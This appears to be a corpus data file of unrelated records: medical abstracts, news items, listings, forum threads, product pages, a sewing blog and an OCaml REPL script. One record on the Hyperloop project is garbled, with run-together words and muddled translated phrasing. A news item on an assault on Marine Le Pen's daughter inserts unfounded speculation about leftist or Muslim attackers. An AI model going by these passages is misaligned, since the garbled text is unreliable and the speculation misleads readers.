Levodropropizine Levodropropizine is a cough suppressant. It is the levo isomer of dropropizine. It acts as a peripheral antitussive, with no action in the central nervous system. It does not cause side effects such as constipation or respiratory depression which can be produced by opioid antitussives such as codeine and its derivatives. References Category:Antitussives Category:Phenylpiperazines Category:Vicinal diols Category:Enantiopure drugs
null
minipile
NaturalLanguage
mit
null
When I first installed (snapshot 24098), there were some asterisk issues i.e. it didn't install. I have however since done that manually (I installed asterisk, pluto-asterisk and asterisk-pluto), and now I can at least access "phone lines" in webadmin. I've put in my credentials, but under status there is just a "," (a comma). In the past I have managed to get the line registered (although it must be said I have never actually got the phone working under LMCE.... but thought getting the line registered would be a good start). Ok, back to basics, because I am worried I am missing something simple here. I've no clue. 1. Does a phone need to be set up first in order to register the line? Should I be able to register the line independently of any phone setup? 2. I have a textbook network setup for LMCE - do I need to enter ANY settings at all on the Gigaset base station itself? Or should I just restore it to factory settings and then leave it alone? If yes, what settings exactly and from where? 3. The phone isn't detected; does it actually need to be added in web admin at all? It would be nice to get everything integrated, but to be honest my main concern is just getting notifications to work properly. okay, as far as I understand:1.) regardless of having registered an external phoneline, phones will be set up. Any MD has an integrated phone, which will be setup and registered automatically.Those phones could for example be used as an intercom. If you set up an external phoneline, then your "intercom" becomes a real telephone.2.) if you want to use your gigaset together with LMCE, you need to set it up manually in LMCE first. As far as I know, there is no template yet for this specific phone.So in order to set up your phone go to webadmin->phones->add device. From there you have to pick a template- either your phone is listed, or you use "Generic SIP softphone". This wil create the proper phone for you. You will then have a phonenumber and a password.3.)if you have done the above steps, you open the website for your gigaset and there you select an ip-connection (don't know with yours, but with mine I can define up to six connections) With this connection you use the phonenumber as both number for the extension as well as username.as for notifications, you probably need to do this in two steps:webadmin->telecom->call routing. There you can define what phones will ring for at home, do not disturb, away and sleepingthe other one is to edit the settings for the phoneline: once you have successfully registered a line with automatic configuration (for me sipgate.co.uk did actually work) you can click on settings. There you can change settings for armed-at home, armed-away, entertaining, sleeping and unarmed-athome. So this will give you proper notifications and you can select, that for example when watching TV or movie, you send your callers to a specific extension or straight to the mailbox I hope this will help you along a bit. But first I guess you have to get your asterisk running properly, or did you happen to fix it now? Thank for this information, that has made things a bit clearer in my head as to what goes where. I have no idea what's going on with asterisk. Some of the packages do not install during the initial Sarah setup screens, but I was able to install manually freepbx(?) and subsequently asterisk, which at least allowed me to access "phone lines" in web admin... However, I cannot register the line, it just says "," where it would normally say "registered <date> <time> <etc>", and I am unsure as to what this means. I can only assume it's an asterisk problem, as on previous installations I was able to register my line. How can I diagnose the problem?? hmm..since you had it working in previous installations....have you tried talk to the guys at the irc about it? perhaps its an issue with the new asterisk package they created...with the last update they said they had cooked their own asterisk-package now... The information you supplied has been put in, but unfortunately, it still says "registration failed" in the gigaset settings. I filled out name password fields using the information generated by LMCE when I added a generic SIP phone. On a slightly seperate note, the line itself is now registered in web admin "Registered, Sun, 17 Jul 2011 20:53:08", but I cannot make or receive calls using the orbiter softphones (I assume I should be able to). The warnings are nothing to be concerned with....but compare my screenshot to yours...notice the difference?I think your phones were not created properly, thats why you cannot use them. Talk to the guys on the irc, maybe they can tell you what script has to get a kickstart from you I have the same problem than Purps (last week full Lmce network install)I can not register my Siemens S675IP.But no problem for my Cisco 7970 (SCCP). Philippe Hi Philippe, I'm not convinced we are experiencing the same problem if one of your phones works; my orbiters' softphones don't even register. Which VOIP provider are you using out of interest, and what method did you use to register your line? Try adding the phone manually in web admin (as a generic SIP phone) and putting the information generated by LMCE into the Gigaset admin page (thanks to maverick0815 for this tip). I'm not convinced we are experiencing the same problem if one of your phones works; my orbiters' softphones don't even register. Which VOIP provider are you using out of interest, and what method did you use to register your line? Try adding the phone manually in web admin (as a generic SIP phone) and putting the information generated by LMCE into the Gigaset admin page (thanks to maverick0815 for this tip). Cheers,Matt. Hi Purps, It is exactly what I do.I manually add a generic SIP phone and put the informtion generated into the Gigaset.I've change the password for testing but same result. It was a different setup for the cisco 7970 (I used the wiki page for it). For my VOIP provider I use the sipgate.co.uk and modify the information to register on my french SIP provider (free.fr).Registration is ok. I've have registered my siemens gigaset on a second ip connexion directly to my SIP provider without problem.It is really the asterisk registration for the siemens that does not work correctly (it worked before the lastest big lmce .deb update on a previous install)
null
minipile
NaturalLanguage
mit
null
Abdominal wall recurrence after laparoscopic colectomy for colon cancer. Although rare, abdominal wall recurrences after laparoscopic surgery for cancer have been increasing at an alarming rate as the range and sheer number of laparoscopic surgical procedures have increased. Overall, 13 case reports of abdominal wall cancer recurrence after laparoscopic surgery have been published. We present the fourth known case of abdominal wall recurrence after laparoscopic colectomy involving a patient with a TNM stage III (T3, N2, M0) colon cancer. Recurrent cancer was located in the abdominal wall incision and also in all four port sites 9 months after surgery. These four cases have all involved patients with advanced cancers of the right side of the colon who underwent a laparoscopic-assisted right hemicolectomy. These cases of abdominal wall cancer recurrence carry ominous implications for the future of laparoscopic surgical procedures involving colorectal malignancy. Recurrent cancer in minilaparotomy incisions may simply be due to local spread of cancerous cells. However, remote port site recurrence may be due to the liberation of cancer cells throughout the abdomen from advanced colorectal cancer no longer confined to the bowel wall facilitated by intraperitoneal carbon dioxide insufflation during laparoscopy. Abdominal wall cancer recurrence is enhanced by the laparoscopic approach to colectomy for colorectal cancer. Except for controlled, clinical studies, laparoscopic colectomy for malignancy should be abandoned.
null
minipile
NaturalLanguage
mit
null
The ex-boyfriend of Sydney dentist Preethi Reddy, whose body was found in a suitcase on Tuesday, died after he deliberately drove his car into the path of a semi-trailer on Monday night, police have revealed. Dr Reddy's body was found in her car, parked in Sydney's east, after she was reported missing when she didn't return home to Penrith on Sunday. Police said she had been stabbed numerous times. The 32-year-old spoke to her family on Sunday morning about 11am, telling them she was planning on a late breakfast before heading home. Dr Reddy and her ex-boyfriend, Tamworth dentist Dr Harshwardhan Narde, had gone to a hotel in Market Street in Sydney's CBD on Saturday night.
null
minipile
NaturalLanguage
mit
null
11111 Lakeside Drive Jonestown, Texas78645United States Get directions ­ ­ A rarity!!! 3 adjacent waterfront lots located in preferred Jonestown!! Beautiful views of the Sandy Creek arm of Lake Travis. Has nice trees and level build sites!!! There is an old log cabin (green) that is deemed to have no structural value... About 11111 Lakeside Drive A rarity!!! 3 adjacent waterfront lots located in preferred Jonestown!! Beautiful views of the Sandy Creek arm of Lake Travis. Has nice trees and level build sites!!! There is an old log cabin (green) that is deemed to have no structural value and an old storage shed. Don't miss this opportunity to build on these special lots!! The information set forth on this site is based upon information which we consider reliable, but because it has been supplied by third parties to our franchisees (who in turn supplied it to us) , we cannot represent that it is accurate or complete, and it should not be relied upon as such. The offerings are subject to errors, omissions, changes, including price, or withdrawal without notice. All dimensions are approximate and have not been verified by the selling party and cannot be verified by Kuper Sotheby's International Realty. It is recommended that you hire a professional in the business of determining dimensions, such as an appraiser, architect or civil engineer, to determine such information.
null
minipile
NaturalLanguage
mit
null
A Little Saigon businessman who trafficked counterfeit dental products and has been ordered to pay $24.1 million in restitution after losing a civil lawsuit is now facing two, related criminal charges following a grand jury indictment. According to Assistant United States Attorney Jeannie M. Joseph, Anh Tuan Luu defrauded customers as well as his former employer, Kerr Corporation, by producing and selling fake versions of that company's trademarked products for six years until 2012. After his arrest, Luu--owner of Tri Dental Innovators/Tri Dental Inc. in Garden Grove--pleaded not guilty inside Orange County's Ronald Reagan Federal Courthouse in December and is free from custody on $250,000 bail. Kerr products Luu allegedly copied included Unidose, Optibond, Revolution and Prodigy, according to the indictment. In March, the company won its $24.1 million civil judgment against Luu. U.S. Magistrate Judge Jean P. Rosenbluth ordered the defendant to surrender his U.S. Passport until the case is resolved. According to court records, Luu--who is represented by a public defender--began his alleged crime spree after Kerr terminated his employment in 2006. A Jan. 27 status conference is scheduled with Judge James V. Selna in Santa Ana.
null
minipile
NaturalLanguage
mit
null
Acute knee joint rupture--a report of two unusual cases. An acute rupture of the knee joint is a well recognized and documented condition. The symptoms and signs it produces have been described as the pseudothrombophlebitis syndrome and its importance in the differential diagnosis of calf pain is being increasingly recognized. We report two cases where the symptomatology has been unusual and stress the need for considering this condition in other atypical cases of leg pain which may not strictly conform in presentation to the pseudothrombophlebitis syndrome.
null
minipile
NaturalLanguage
mit
null
Young Chinese Children's Academic Skill Development: Identifying Child-, Family-, and School-Level Factors. This chapter addresses how child-, family-, and school-level characteristics are associated with Chinese children's academic skill development during their preschool years. Academic skills are defined in terms of young children's emergent competencies in academic domains including literacy, mathematics, and science. First, we review the relations of young Chinese children's cognition (language, visuospatial, and executive functioning), behavior (social behavior and behavioral regulation), and affect (interest and attitude) to their performance in these academic domains. Second, we review the roles of familial variables, including family socioeconomic status and broad and specific aspects of parenting practices and parental involvement. Third, we review school- and classroom-level factors, with a special emphasis on preschool and classroom quality that is particularly relevant to young Chinese children's academic skills. We discuss the educational implications of these study findings and identify methodological limitations that may threaten their internal and external validity. Our aim is to bring attention to the growing body of research on young Chinese children's academic skill development and to highlight several areas that need further research.
null
minipile
NaturalLanguage
mit
null
What’s new in ApexSQL Unit Test 2016 Create tests directly in SQL Server Management Studio SQL Server unit tests can be created directly from Object explorer in SSMS, from the add-in context menu: Manage all tests with a single form The Unit Test explorer tab allows managing unit tests. SQL Server unit tests can be created, renamed, edited, deleted or run. When the Unit Test explorer tab is open (active), use the context menu to manipulate with a specific SQL Server unit test: Multiple sources for installing tSQLt The tSQLt framework can be installed from web, file system, or using the built-in version of tSQLt. This allows the user to choose a specific version of tSQLt framework or to use the built-in one included in ApexSQL Unit Test: Organize tests in test classes Run tests with a single click SQL Server unit tests can be run either from the Unit Test explorer tab using the context menu: The toolbar menu item performs similar functionality but only executes SQL Server unit tests in window that has focus. If the Object Explorer and Unit Test explorer are both opened, the one that has focus and selected/highlighted test will execute in Unit Test Explorer: In the Unit test explorer the user can select a single test, all tests from a class or all tests from server in order to execute it (them). Run tests directly from the Query window SQL Server unit tests are written in a query window using standard T SQL. Tests can be run by highlighting the test name (stored procedure name) and selecting the Run highlighted option from the add-in toolbar in SSMS. Run tests under one class with a single click SQL Server unit tests from a single test class can be run directly from the Unit Test Explorer tab by selecting the class which contains a list of tests and execute all of them. Another way is to locate class (schema) in Object Explorer and right click on schema and choose “Run All”: This will also execute all tests under that class. Get messages about passed and failed tests When running tests in the Unit Test explorer tab, messages with details about test results failed are being displayed: Automated test execution ApexSQL Unit Test can be automated via the command line interface (CLI) Export test results when using the CLI SQL Server unit test results can be exported by using CLI in XML. To export test results from the CLI it is necessary to select a path where results should be exported and to select a test report:
null
minipile
NaturalLanguage
mit
null
Fox might be open to bringing the cult favorite back to life, but some things are best left in the past. No show understands better the idea of life after death than “Buffy the Vampire Slayer,” so in these heady times of reboots and revivals, it’s not exactly a shock to hear that according to Fox TV group chair Gary Newman, bringing back the show is something “we talk about frequently.” The cult favorite, which ran originally from 1997 to 2003, was groundbreaking television for its time. During its seven-season run, the drama-comedy-supernatural mishmash created by Joss Whedon represented a lot of storytelling highs, while behind the scenes, it launched the careers of a number of great writers, including “UnREAL” co-creator Marti Noxon, “Once Upon a Time” executive producer Jane Espenson, “The Martian” screenwriter Drew Goddard, and many others. Over 20 years later, “Buffy” still means a lot to its fans, and the good news for those who might be nervous about the possibility of a revival happening is that according to Newman, it would depend entirely on Whedon coming to 20th Century Fox with an idea. As reported by Variety, “Most times when we brought things back, it started with the creator coming into us and saying I’ve got another story I want to tell,” Newman said. “It seems to me that if there isn’t a real sense of nostalgia, a passionate fan base demonstrating they still want it, then I don’t really buy bringing these shows back.” As Newman said, Fox has brought back a number of its older properties lately, including “The X-Files,” “24” and “Prison Break.” The success of those revivals has been mixed, on either a creative or a ratings level, but it is nice to know that as far as Fox is concerned, Whedon would be involved. (And yes, it’s also worth noting that Whedon is technically available to take on a potential reboot, having recently exited the proposed “Batgirl” movie after a year of development.) There’s no clean answer as to where a “Buffy” revival would air: Given its cult status, it was never a ratings hit during its original run, and the two networks on which it aired — the WB and UPN — no longer exist. It is fun to remember that, technically, Buffy is now a Disney princess in the aftermath of the Fox/Disney acquisition, but that means the Fox network wouldn’t be the default home for it. And really, do we need more “Buffy”? There’s no denying the meaning that “Buffy” had for a still passionate fanbase, and the #MeToo era could always use another hero who finds as much strength in her good heart and sharp wit as she does in her superpowers. But there are too many ways this could go wrong. For one thing, a big factor is whether a new “Buffy” would be a revival, continuing the story with (potentially) original series star Sarah Michelle Gellar reprising the title role, or a pure reboot, tripping back to the original premise of “teen girl struggles with high school by day and slays vampires by night” with a whole new cast. The revival approach might be the one most palatable to fans with a fondness for the original series, though the reboot might have the most creative energy, and would free up a whole new approach to the narrative, letting Whedon update the premise for this century. Either direction seems fraught with peril, unfortunately, and ultimately not as interesting as letting Whedon, still one of TV’s most iconic showrunners, develop a fresh new idea. That’s ultimately what we’ll keep our fingers crossed for. Sign Up: Stay on top of the latest breaking film and TV news! Sign up for our Email Newsletters here.
null
minipile
NaturalLanguage
mit
null
Pulmonary intravascular macrophages in deer. Pulmonary intravascular macrophages (PIMs) have been found in the septal capillaries of deer lungs. Lung samples from adult deer were fixed in 2.5% glutaraldehyde, and then routinely processed for electron microscopy. The main features of the PIMs were the presence of tubular invaginations in the membrane (micropinocytosis vermiformis), phagosomes, and junctions with endothelial cells. A mean of 4.4 of these junctions was recorded per cell. They comprised segments ranging from 67 to 289 nm in length, where the plasma membranes were separated by spaces from 10 to 25 nm wide. In these areas the cytoplasm underlying the membranes showed evidence of increased electron density. When PIMs were compared with alveolar macrophages, it could be seen that although the PIMs were more numerous (more than twice), they were also smaller than the alveolar macrophages (47.625 versus 101.260 microns2 respectively.
null
minipile
NaturalLanguage
mit
null
Cnoc Raithní Cnoc Raithní (, "hill of bracken") is a tumulus (burial mound) and National Monument located on Inisheer, Ireland. Location Cnoc Raithní is located on the northern edge of Inisheer, overlooking the harbour. History The lower tier is dated to c. 2000–1500 BC, making this the earliest known settlement site on the island. The upper part is believed to be Early Christian (5th to 8th centuries AD). The site was covered by sands before being exposed by a storm in 1885; in that year, it was excavated by D. Murphy and cordoned cinerary urns with cremated bones and a bronze awl were found. Description A circular sandy mound revetted by a drystone wall. About 27 slab-lined graves protrude above the south half. The north half is occupied by a kerbed platform with two limestone pillars. References Category:Archaeological sites in County Galway Category:National Monuments in County Galway Category:Buildings and structures completed in the 2nd millennium BC Category:Tumuli in Ireland Category:Aran Islands
null
minipile
NaturalLanguage
mit
null
#use "topfind";; #require "compiler-libs";; #require "unix";; (*#require "reason";;*) #load "ocamlcommon.cma";; #load "unix.cma";; (*#load "reason.cma";;*) type syntax = Reason | OCaml type eval_result = Success | Error of string type mode = | RunCode of string * syntax | StartRepl of syntax | PrintExpression of string * syntax | Stdin of syntax | Invalid of string type args = {mode: mode} exception LangException of string let _ = let interactive_mode = ref false in let eval_filepath = ref None in let quiet = ref false in let syntax = ref OCaml in let print_mode = ref false in let run_mode = ref false in let ps1 = Sys.getenv_opt "PRYBAR_PS1" |> function | Some str -> str | None -> "#" in let ps2 = Sys.getenv_opt "PRYBAR_PS2" |> function | Some str -> str | None -> " " in (* If there is code provided to interpret *) let code = ref "" in let parse_syntax = function | "re" -> syntax := Reason | "ml" -> syntax := OCaml | arg -> raise (Arg.Bad ("Unknown syntax: " ^ arg)) in let print_mode_arg str = print_mode := true ; code := str in let run_mode_arg str = run_mode := true ; code := str in let speclist = [ ("-q", Arg.Set quiet, "Don't print OCaml version on startup") ; ( "-e" , Arg.String print_mode_arg , "Eval and output results of interpreted code" ) ; ("-c", Arg.String run_mode_arg, "Run code without printing the output") ; ("-i", Arg.Set interactive_mode, "Run as interactive repl") ; ( "-s" , Arg.Symbol (["ml"; "re"], parse_syntax), " Sets the syntax for the repl (default: ml)" ) ] in let usage_msg = "OCaml / Reason repl script for prybar. Options available:" in Arg.parse speclist (fun str -> match (str, !interactive_mode) with | (path, true) -> eval_filepath := Some(path) | _ -> print_endline ("Anonymous arg: " ^ str) ) usage_msg ; let mode = match (!print_mode, !run_mode, !interactive_mode) with | true, false, false -> PrintExpression (!code, !syntax) | false, true, false -> RunCode (!code, !syntax) | false, false, true -> StartRepl !syntax | _ -> Invalid "You can only use one mode: -e | -i | -c" in let module Custom_Toploop = struct include Toploop open Format (* Most stuff is straightly copied and modified * from github.com/ocaml/ocaml/blob/trunk/toplevel/toploop.ml *) exception PPerror let first_line = ref true let got_eof = ref false let refill_lexbuf buffer len = if !got_eof then ( got_eof := false ; 0 ) else let prompt = if !first_line then ps1 ^ " " else if Lexer.in_comment () then "* " else ps2 (* continuation prompt *) in first_line := false ; let len, eof = !read_interactive_input prompt buffer len in if eof then ( Location.echo_eof () ; if len > 0 then got_eof := true ; len ) else len (* Minimal version of just running any input file, we stripped a lot of original logic * because we don't want to do any side effects on the compiler environment *) let run_script ppf name = let explicit_name = (* Prevent use_silently from searching in the path. *) if name <> "" && Filename.is_implicit name then Filename.concat Filename.current_dir_name name else name in use_silently ppf explicit_name let loop ppf = Clflags.debug := true ; Location.formatter_for_warnings := ppf ; ( try initialize_toplevel_env () with | (Env.Error _ | Typetexp.Error _) as exn -> Location.report_exception ppf exn ; exit 2 ) ; let lb = Lexing.from_function refill_lexbuf in Location.init lb "//toplevel//" ; Location.input_name := "//toplevel//" ; Location.input_lexbuf := Some lb ; Sys.catch_break true ; (*load_ocamlinit ppf;*) (* If there's an entry file provided, run it before dropping into interactive mode *) (match !eval_filepath with | Some name -> run_script ppf name | _ -> false) |> ignore ; while true do let snap = Btype.snapshot () in try Lexing.flush_input lb ; Location.reset () ; Warnings.reset_fatal () ; first_line := true ; let phr = try !parse_toplevel_phrase lb with Exit -> raise PPerror in let phr = preprocess_phrase ppf phr in Env.reset_cache_toplevel () ; ignore (execute_phrase true ppf phr) with | End_of_file -> exit 0 | Sys.Break -> fprintf ppf "Interrupted.@." ; Btype.backtrack snap | PPerror -> () | x -> Location.report_exception ppf x ; Btype.backtrack snap done end in let module Repl = struct let std_fmt = Format.std_formatter let noop_fmt = Format.make_formatter (fun _ _ _ -> ()) ignore let init_toploop () = Topfind.add_predicates ["byte"; "toploop"] ; (* Add findlib path so Topfind is available and it won't be initialized twice if the user does [#use "topfind"]. *) Topdirs.dir_directory (Findlib.package_directory "findlib") ; Toploop.initialize_toplevel_env () let start_loop ?(fmt = std_fmt) () = Custom_Toploop.loop fmt let eval ?(fmt = std_fmt) ~syntax str = try let lex = Lexing.from_string str in let tpl_phrases = match syntax with | OCaml | Reason -> Parse.use_file lex (*| Reason ->*) (*List.map Reason_toolchain.To_current.copy_toplevel_phrase*) (*(Reason_toolchain.RE.use_file lex)*) in let exec phr = if Toploop.execute_phrase true fmt phr then Success else Error "No result" in let rec execAll phrases = match phrases with | [] -> Error "No result" | [phr] -> exec phr | phr :: next -> ( let ret = exec phr in match ret with Error _ -> ret | _ -> execAll next ) in execAll tpl_phrases with | Syntaxerr.Error _ -> Error "Syntax Error occurred" (*| Reason_syntax_util.Error _ -> Error "Reason Parsing Error"*) | _ -> Error ("Error while exec: " ^ str) end in if not !quiet then print_endline ("OCaml " ^ Sys.ocaml_version ^ " on " ^ Sys.os_type); match mode with | PrintExpression (code, syntax) -> Repl.init_toploop () ; Repl.eval ~syntax code |> ignore | RunCode (code, syntax) -> Repl.init_toploop () ; Repl.eval ~syntax ~fmt:Repl.noop_fmt code |> ignore | StartRepl syntax -> Repl.init_toploop () ; Repl.start_loop () | Stdin syntax -> print_endline "Reading from stdin" | Invalid str -> print_endline str
null
minipile
NaturalLanguage
mit
null
U.N. Secretary General urges more aid for people of Mosul New York, Unired States (Reuters): United Nations Secretary General Antonio Guterres on Friday called on the international community to increase aid to help people fleeing the Iraqi city of Mosul which government forces have been battling to retake from Islamic State. Iraqi forces have seized back most of the country's second-largest city from the Sunni hardline group in a massive six-month campaign. But at least 355,000 residents have fled fighting, according to the government, and some 400,000 civilians remain trapped inside the densely-populated Old City where street battles have raged for weeks. "We don't have the resources necessary to support these people," Guterres told reporters during a visit to the Hassan Sham Camp, one of several centers outside Mosul packed with civilians escaping the fighting. The U.N. and Iraqi authorities have been building more camps but struggle to accommodate new arrivals with two families sometimes having to share one tent. "Unfortunately our program is only 8 percent funded," he said, referring to a 2017 U.N. humanitarian response program without giving additional details. Iraqi forces have won back control of most cities that fell to the group and the militants have been dislodged from nearly three quarters of Mosul but remain in control of its center. Government positions have reached as close as 500 meters to the al-Nuri Mosque, from where Islamic State leader Abu Bakr al-Baghdadi declared a caliphate spanning parts of Iraq and Syria in July 2014. Baghdadi and other IS leaders are believed to have left the city but U.S. officials estimate around 2,000 fighters remain inside the city, resisting with snipers hiding among the population, car bombs and suicide trucks targeting Iraqi positions.
null
minipile
NaturalLanguage
mit
null
The attack took place at the exit of a bowling alley at Nelson Mandela Square on Thursday night while she and her 18-year-old cousin were leaving. Two men aged 32 and 47 from Nanterre approached the two and physically assaulted them at around 2 am, hitting Le Pen’s daughter in the head, Le Parisien reports. Breitbart The two are now in police custody. But no information on their motives has been communicated by the authorities. It is not known if they were aware of whom they assaulted, or if they acted at random. (It is possible that because Marine Le Pen, a recent presidential right wing candidate and leader of the anti-Islamization Front National party, her daughter was targeted either by opposition party leftists or Muslims looking for revenge on her mother) Investigators have so far not commented on the cause of the attack but the cousin of Ms Le Pen’s daughter has filed charges with police against the two men. The incident provoked outrage from the former French presidential candidate who called the attack a “gratuitous aggression,” and added: “there was no fight … there was an assault, a gratuitous assault on two young people aged 18 and 19.” “But this is not inevitable. This is, I believe, the consequence of political choices that have been made for a number of years,” she continued, saying her daughter was in a state of shock about the attack but that she was relieved the incident was not more serious. France24 Le Pen’s party name, Front National, was changed to “Rassemblement national” — which can be translated as National Rally or National Gathering – and is designed to facilitate political alliances with like-minded factions.
null
minipile
NaturalLanguage
mit
null
About Whether it’s cleaning up dust and debris from a new construction site, deep cleaning an apartment after a move-out, or getting your new home in pristine condition for a move in, these jobs are totally different than hiring a housekeeper for your home. To do it right usually requires going over surfaces and corners multiple times to ensure that every piece of dust is gone. Our specialists are trained to make sure every crevice is spotless. We specialize in new/post construction clean ups, development projects, and move in/move out detail jobs. For corporate apartment rentals for relocation teams, we also manage the constant maintenance, turnover, inventory and seasonal cleaning. Our services include preparing apartments for staging, where we do a complete overhaul of the home prior to putting the home on the market. Rest easy, we are insured and bonded.
null
minipile
NaturalLanguage
mit
null
Currentlyworkingon the project"more than a hundredgreat peoplewho workwithout payin exchangeforshares in the company." As stated,many of themhave their ownjobsand businesses, butHTT-to devotedozens ofhoursa week. First would beworkingnetworkin the US, whichshould belinked toallmajor UScities, and thenmake the projectmovedto Europe, Africa and Asia. HTThas announced thatfor the projectneedbetween seven and19 billiondollars, andCEODirkAlbornsaidthat it is sobroadassessmentrequireddue to unforeseenmaterial pricesandcostsfor a period often years. HTToperates under thecompany'sfundraisingJumpStartFund, whoseAlbornpresident, and apparentlythere are alreadymany donorsandinvestorswho wantto investmoney. Albornacknowledged that theten-year planmay beambitious, because they did nottake into account theregulationof the legal frameworkand the"political problems". -We want to betransparent. For us, thefirstgoal is to build"Hiperlup", we want toseein the United States, and if itmade more senseto do itin anotherterritory, it will beso. The goalisto build it. The second goalis to make itcost effective. We have an ideathatthere areluxurycapsules, buttheeconomy classtravelcost20-30 US dollars. Ideally, the ordinary farewould befree, and paidtothecommercials-saysAlborn. Capsulesshouldfloatednearlysupersonic speedsfrompoint A to pointBonthe airbag,which wouldeliminatefriction- liketurnon the tableforair hockey. Thecapsuleswould bemaintainedpressure, and under thisproject, the travelers during the tripwouldfeelslightlystronger force, asduringtake-offorlanding,orridein an amusement park. -Whilenotinventthe rightbeam, which wouldreallybe cool, the only wayforsuper-fast journeyisthrough a pipein whichthere were specialconditions-said thenMask. Wednesday, 3 December 2014 Did you know that the air we breathe isn’t just oxygen, infact it’s made up of a number of different gases such as nitrogen, oxygen, carbon dioxide, argon, neon and many others. Each of these gases carry useful properties so separating them from the air around us is extremely beneficial. The process is called fractional distillation and consists of two steps, the first relies on cooling the air to a very low temperature (i.e. converting it into a liquid), the second involves heating it up thus allowing each gas within the mixture to evaporate at its own boiling point. The key to success here is that every element within air has its own unique boiling temperature. As long as we know these boiling temperatures we know when to collect each gas. So what are the real world benefits of separating and extracting these gases? Well liquid oxygen is used to power rockets, oxygen gas is used in breathing apparatus, nitrogen is used to make fertilizers, the nitric acid component of nitrogen is used in explosives. The other gases all have their own uses too, for example argon is used to fill up the empty space in most light bulbs (thanks to its unreactive nature). Carbon dioxide is used in fire extinguishers and is great for putting out fires in burning liquids and electrical fires. There really are too many uses to list but suffice it to say that fractional distillation is an extremely useful process for humans the world over. Monday, 1 December 2014 There’s really a more productive way to spend Black Friday instead of going berserk and storming the stores. A really huge crowd of 90,000 people capable of invading every bigger mall during the yesterday’s run-and-buy frenzy, has made history sending greetings to our reddish neighboring planet. “Today uwingu.com sent almost 90,000 messages to Mars—first time people’s names & messages sent to Mars by radio!” the Uwingu company which crowd funds space projects, said on Twitter. It was a global shout-out event to mark the 50th anniversary of NASA’s Mariner 4 - the first mission to Mars.
null
minipile
NaturalLanguage
mit
null
Multi-partisan thinking needed in White House August 28, 2008 Written by REUBEN MEES Over the past nine months, Sen. Barack Obama has repeatedly made two promises to the American public — change and unity. With the Democratic primary looming close and his nomination as the party’s candidate sealed, it is time for him to start living up to those promises by announcing the person he will have as his vice-presidential candidate. It’s becoming clear to a lot of people that Sen. Hillary Clinton — a remnant of her husband’s era that interrupted the Bush administrations — does not represent the kind of change Americans want. And having two Democratic senators on the ticket would not represent any real diversity in political ideology, although gender and race would be well reflected. But whenever I think about change and unity, I always veer away from the two main parties and find myself siding with some little known third party candidate or independent with little to no name recognition. So who should Obama pick? My first choice would be to ask Ron Paul. Although he has borne an R behind his name in past elections, he has demonstrated an ability to draw supporters from both parties disenfranchised with the stagnant policies of the past — not to mention his ability to gather campaign cash on a grassroots level. What a better way to offer the laurel of unity than to extend an invitation to the vice-presidency to a member of the opposite party. The big asterisk being that he is far afield of modern mainstream Republican ideals. Of course, his philosophy of retreating from world affairs may be even further afield from Obama’s more liberal agenda, which brings me to my second suggestion. Ralph Nader. The avid consumer advocate is already interjecting his voice in the race, criticizing the mainstream candidates for their inability to make definitive statements or take a solid stance on pretty much any issue they are questioned about. Nader, although he has lost credibility as a serious candidate since the 2000 election, does represent the position of many U.S. citizens as they become ever more aware of green energy, huge corporate conglomerates dictating the lives of Americans or the war in Iraq and other foreign policies issues. I guess the next question is: Would either of these guys consider it if offered? And unfortunately, the answer is probably no. Although they each espouse alternative political views that would be beneficial in significant policymaking decisions that affect our country, I’m sure they would have some excuse for opting out. Whether it be some particular social or economic issues the two men would invariably butt heads over or merely the fact that their egos would not allow them to take a back seat to someone else they may not agree with entirely. Or maybe the conspiracy theorists who claim Nader only gets in presidential aces to divert Democratic votes and seal Republican victories are right. If they were wise and truly wanted the change they talk about, however, they would look at it as an opportunity to open the door to the ideas they represent on a national level. And then, the Obama ticket could claim more than lip service to making our multi-partisan nation a progressive one dedicated to change and unity.
null
minipile
NaturalLanguage
mit
null
Q: Virus replicating through signals to civilizations I've read a story once. So, people have received a signal from space and it turned out that the signal was some kind of scheme or something, and when they built that thing, it captured the Earth and started sending the same signal to space. Looked like something like a self-replicating virus in space. Does anyone remember who is the author of this novel? I'm not quite sure about details but the main idea was about virus replicating through information transimission. It may be authored by Isaac Asimov, but I can't find such a story from him. A: This is actually a pretty common trope in sci-fi. There's a couple of the more obvious books that immediately spring to mind; 1) A for Andromeda by Fred Hoyle. A new radio telescope picks up from the constellation of Andromeda a complex series of signals which prove to be a programme for a giant computer. After the computer is built it begins to relay information from Andromeda. Scientists find themselves possessing knowledge previously unknown to mankind, knowledge that could threaten the security of human life itself. 2) His Master's Voice by Stanislaw Lem; Twenty-five hundred scientists have been herded into an isolated site in the Nevada desert. A neutrino message of extraterrestrial origin has been received and the scientists, under the surveillance of the Pentagon, labor on His Master's Voice, the secret program set up to decipher the transmission. Among them is Peter Hogarth. When he discovers that the TX Effect could lead to the construction of a fission bomb, Hogarth decides such knowledge must not be allowed to fall into the hands of the military. A: Existence by David Brin matches what you're looking for. Civilizations build themselves into ruin after finding artifacts from space, and transmit more of the same artifacts that then infect other civilizations.
null
minipile
NaturalLanguage
mit
null
Latest Geox Shahira Trainers Blue for Women Sale Online £142.64 £85.43 Please Choose: Add to Cart: Product Description Both trendy and sporty, these Geox low top trainers are an essential item. Comfortable and stylish, they have aupper and they come in a great blue colour. The Shahira is made with a synthetic sole and a fabric lining. So, what do you think? Model: Cheap 011 595 Units in Stock This product was added to our catalog on Thursday 17 November, 2016. Choose a ranking for this item. 1 star is the worst and 5 stars is the best. Please tell us what you think and share your opinions with others. Be sure to focus your comments on the product. NOTE: HTML tags are not allowed.NOTE: Reviews require prior approval before they will be displayed
null
minipile
NaturalLanguage
mit
null
Do you ever shy away from sewing fashions, since getting the right fit may seem daunting? Don’t worry—you’re not alone. During the next two Sewing With Nancy episodes featuring the new show, Solving the Pattern Fitting Puzzle, I’d like to share with you my favorite pattern fitting techniques that are easily mastered without cutting the original pattern pieces apart! The random winner of a copy of the book, Sew Gifts—Make Memories by Mary Mulari, is Nadine Nakano, who shared, “I have a huge box of old jeans that I want to upcycle so I’ll use a lot of it for the holidays as gifts”. Don’t forget to submit your holiday stocking in my Stocking Challenge! The deadline to enter is MONDAY, December 7, 2015. Click here to see how to enter. Make sure you are subscribed to my enews mailing list so you won’t miss a thing. Sign up here. Related Posts 99 Comments I just received my book “Pattern Fitting with Confidence” by Nancy Zieman. I have also acquired a pattern from Seamwork which obviously is not sized as McCall’s and Simplicity. How do I determine which size to use? Here is a link to their sizing charts: https://help.colettemedia.com/patterns/size-charts Nancy ZiemanAugust 6, 2016 Lana, I don’t know the answer as I have not worked with Seamwork. Perhaps you could contact them to see how their sizing correlates with the standard McCall’s and SImplicity 